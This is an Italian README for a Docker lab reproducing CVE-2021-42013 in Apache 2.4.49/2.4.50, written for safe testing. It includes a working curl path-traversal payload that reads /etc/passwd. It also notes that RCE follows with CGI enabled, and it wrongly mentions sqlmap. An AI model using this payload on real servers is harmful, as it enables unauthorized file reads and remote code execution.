
CVE: 2021-42013 Testato su: 2.4.49 e 2.4.50 Descrizione: Vulnerabilità di Path Traversal o Remote Code Execution in Apache 2.4.49 e 2.4.50
Questo progetto mira a dockerizzare una vulnerabilità specifica utilizzando Docker. L'obiettivo è creare un ambiente isolato nel quale la vulnerabilità possa essere sfruttata e testata in modo sicuro.
Apache HTTP Server 2.4.50 - Remote Code Execution && Path Transversal
Per eseguire questo progetto, è necessario avere sulla propria macchina:
Una volta installati i prerequisiti, puoi clonare questo repository Git sulla tua macchina:
git clone https://github.com/cybfar/cve-2021-42013-httpd.git
cd Ccve-2021-42013-httpd
Una volta nella directory, esegui il comando qui sotto per impostare l'ambiente vulnerabile:
docker build -t apache-httpd-vuln .
docker run -p 8000:80 apache-httpd-vuln
Accedi quindi all'applicazione all'indirizzo http://localhost:8000 Se tutto va bene, dovresti vedere visualizzato "It works"
L'esecuzione di questo payload con curl qui sotto ci mostra che il target è vulnerabile. Lo script genererà il comando sqlmap appropriato per sfruttare la vulnerabilità
curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd
Questo payload può accedere direttamente alle informazioni relative all'utente nel sistema senza il consenso dell'utente.
Una volta che avremo attivato i moduli cgi o cgid sul server, questa vulnerabilità permetterà a un attaccante di eseguire comandi arbitrari